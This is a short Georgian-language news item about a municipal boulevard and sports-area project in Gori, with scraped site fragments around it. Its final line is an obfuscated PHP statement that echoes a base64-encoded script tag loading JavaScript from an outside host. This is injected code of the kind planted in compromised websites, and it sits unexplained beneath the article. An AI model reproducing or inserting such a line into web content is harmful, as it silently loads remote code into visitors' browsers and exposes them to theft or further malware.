celsiusi
ავერსი საქკაბელი

 გორში, შინდისის გმირების გამზირზე ბულვარი, დასასვენებელი და სპორტული სივრცეები მოეწყობა. ამის შესახებ ინფორმაციას გორის მერია ავრცელებს.

მათივე ცნობით, სამუშაოების მიმდინარეობას გორის მუნიციპალიტეტის მერი ვლადიმერ ხინჩეგაშვილი ინფრასტრუქტურისა და ზედამხედველობის სამსახურების ხელმძღვანელებთან ერთად გაეცნო.

„6 790 კვადრატულ მეტრზე განთავსდება საბავშვო და მაგიდის ჩოგბურთის სათამაშო სივრცეები, ცალფარიანი კალათბურთის მინიმოედნები, ტრენაჟორები, გარეგანათება, სარწყავი სისტემა, დეკორატიული ღობე, გაზონი, სკამები, ურნები, წყლის სოკოები და ფანჩატურები.

სამუშაოების ღირებულება მილიონ ლარზე მეტია“, - ნათქვამია ინფორმაციაში.

116
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");